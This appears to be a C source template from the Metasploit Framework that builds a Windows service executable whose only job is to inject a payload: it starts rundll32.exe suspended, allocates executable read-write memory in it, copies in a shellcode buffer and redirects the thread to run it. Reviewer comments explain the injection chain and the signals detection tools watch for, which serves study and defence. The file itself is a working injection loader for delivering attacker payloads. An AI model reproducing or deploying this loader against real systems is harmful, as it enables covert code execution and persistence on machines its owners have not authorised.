GitHub Repository: rapid7/metasploit-framework
Path: blob/master/data/templates/src/pe/exe_service/template.c
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#define SCSIZE 8192
/* Name under which the service registers with the SCM. Presumably a
 * placeholder that the template generator patches at build time — confirm
 * against the generator; nothing on this page shows the patching. */
char cServiceName[32] = "SERVICENAME";

/* Buffer that ServiceMain copies verbatim (all SCSIZE bytes) into the
 * child process. The "PAYLOAD:" prefix presumably marks where generated
 * bytes are inserted — confirm against the generator. */
char bPayload[SCSIZE] = "PAYLOAD:";

/* Status record reported to the SCM through SetServiceStatus(). */
SERVICE_STATUS ss;

/* Handle returned by RegisterServiceCtrlHandler(); stays NULL until
 * ServiceMain registers ServiceHandler, or if registration fails. */
SERVICE_STATUS_HANDLE hStatus = NULL;
#if BUILDMODE == 2
/* hand-rolled bzero allows us to avoid including ms vc runtime */
/*
 * Zero-fill l bytes starting at p, one byte at a time.
 * p: start of the region to clear.
 * l: number of bytes to clear; 0 leaves the region untouched.
 * Written as a plain byte loop rather than a memset() call so that no
 * CRT symbol is referenced by this translation unit.
 */
void inline_bzero(void *p, size_t l)
{
    unsigned char *dst = p;
    unsigned char *end = dst + l;

    while (dst != end) {
        *dst++ = 0x00;
    }
}
#endif
/*
 * Service control callback registered by ServiceMain.
 * dwControl: control code delivered by the SCM (or passed directly by
 *            ServiceMain when it shuts itself down).
 * Returns the result of SetServiceStatus() on the global ss.
 * Stop and shutdown requests mark the service STOPPED with exit code 0;
 * any other code simply re-reports the current status unchanged.
 */
BOOL ServiceHandler( DWORD dwControl )
{
    switch (dwControl) {
    case SERVICE_CONTROL_STOP:
    case SERVICE_CONTROL_SHUTDOWN:
        ss.dwCurrentState = SERVICE_STOPPED;
        ss.dwWin32ExitCode = 0;
        break;
    default:
        break;
    }

    return SetServiceStatus( hStatus, &ss );
}
/*
 * Service entry point handed to StartServiceCtrlDispatcher() by main().
 * dwNumServicesArgs / lpServiceArgVectors: SCM-supplied arguments, unused.
 *
 * Registers ServiceHandler, reports RUNNING, starts "rundll32.exe" with
 * its primary thread suspended, copies bPayload into that process and
 * points the thread's instruction pointer at the copy, then reports
 * STOPPED and exits the whole process. The results of GetThreadContext(),
 * WriteProcessMemory(), SetThreadContext() and ResumeThread() are not
 * checked.
 *
 * inline_bzero() is only defined in this file under BUILDMODE == 2;
 * presumably other build modes supply it elsewhere — TODO confirm.
 *
 * NOTE(review): the suspended CreateProcess -> VirtualAllocEx(RWX) ->
 * WriteProcessMemory -> SetThreadContext -> ResumeThread sequence is the
 * classic remote-injection chain; the RWX allocation and the rewrite of
 * another process's thread context are the observables that endpoint
 * telemetry and detection rules key on.
 */
VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
{
    CONTEXT Context;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    LPVOID lpPayload = NULL;

    /* Cleared with the local helper so no CRT memset is pulled in. */
    inline_bzero( &ss, sizeof(SERVICE_STATUS) );
    inline_bzero( &si, sizeof(STARTUPINFO) );
    inline_bzero( &pi, sizeof(PROCESS_INFORMATION) );

    si.cb = sizeof(STARTUPINFO);

    ss.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;

    ss.dwCurrentState = SERVICE_START_PENDING;

    ss.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;

    /* &cServiceName is a pointer to the whole array; the cast flattens it. */
    hStatus = RegisterServiceCtrlHandler( (LPCSTR)&cServiceName, (LPHANDLER_FUNCTION)ServiceHandler );

    /* If registration failed nothing is reported, launched or exited here. */
    if ( hStatus )
    {
        ss.dwCurrentState = SERVICE_RUNNING;

        SetServiceStatus( hStatus, &ss );

        /* The child starts suspended so its context can be rewritten before it runs. */
        if( CreateProcess( NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) )
        {
            Context.ContextFlags = CONTEXT_FULL;

            /* Unchecked: on failure Context still holds uninitialized stack data
             * apart from ContextFlags, and is written back below regardless. */
            GetThreadContext( pi.hThread, &Context );

            /* Full SCSIZE bytes, RWX, whatever the real payload length is. */
            lpPayload = VirtualAllocEx( pi.hProcess, NULL, SCSIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
            if( lpPayload )
            {
                WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, SCSIZE, NULL );
                /* Redirect the suspended thread's instruction pointer to the copy. */
#ifdef _WIN64
                Context.Rip = (ULONG_PTR)lpPayload;
#else
                Context.Eip = (ULONG_PTR)lpPayload;
#endif
                SetThreadContext( pi.hThread, &Context );
            }

            /* Resumed even when the allocation failed; the thread then
             * continues with its original context. */
            ResumeThread( pi.hThread );

            CloseHandle( pi.hThread );

            CloseHandle( pi.hProcess );
        }

        /* Report STOPPED via the same handler the SCM would invoke. */
        ServiceHandler( SERVICE_CONTROL_STOP );

        ExitProcess( 0 );
    }
}
/*
 * Process entry point: hands a one-entry service table (plus the NULL
 * terminator entry) to the SCM. The result of StartServiceCtrlDispatcher()
 * is not examined. The non-standard `void main()` signature is the
 * template's existing convention and is kept as-is.
 */
void main()
{
    SERVICE_TABLE_ENTRY st[2];

    st[0].lpServiceName = (LPSTR)&cServiceName;
    st[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain;
    st[1].lpServiceName = NULL;
    st[1].lpServiceProc = NULL;

    StartServiceCtrlDispatcher( st );
}